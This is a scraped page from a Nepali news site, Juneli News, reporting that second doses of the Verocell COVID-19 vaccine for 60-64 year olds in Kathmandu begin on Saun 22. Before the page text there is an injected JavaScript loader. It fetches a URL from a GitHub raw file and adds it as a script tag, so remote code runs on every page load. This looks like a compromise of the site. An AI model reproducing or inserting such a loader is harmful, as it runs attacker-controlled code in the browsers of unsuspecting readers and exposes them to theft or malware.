;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौंमा कोभिड–१९ विरुद्धको भेरोसेल खोपको दोस्रो डोज साउन २२ देखि सुरु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • काठमाडौंमा कोभिड–१९ विरुद्धको भेरोसेल खोपको दोस्रो डोज साउन २२ देखि सुरु
Breaking News

काठमाडौंमा कोभिड–१९ विरुद्धको भेरोसेल खोपको दोस्रो डोज साउन २२ देखि सुरु

जुनेली न्यूज, काठमाडौं । काठमाडौंमा कोभिड–१९ विरुद्धको भेरोसेल खोपको पहिलो डोज लगाएका ६० देखि ६४ वर्ष उमेर समूहका नागरिकले फेरी साउन २२ देखि दोस्रो डोज  लगाउन पाउने भएका छन् ।

स्वास्थ्य कार्यालय काठमाडौंका प्रमुख बद्रीबहादुर खड्काले सूचना जारी गरी जेठ २५ गतेयता पहिलो डोज लगाएका ६०–६४ वर्ष उमेर समूहका नागरिकलाई २२–२४ साउनसम्म खोप लगाउने कार्यक्रम तय भएको जानकारी दिनुभयो |

खोपको पहिलो डोज लगाएको तीन हप्ता पूरा भएका नागरिकलाई काठमाडौंका सबै पालिकामा दोस्रो डोज खोपका लागि  सूचना गरिएको छ |

 

फेसबुक प्रतिक्रियाहरु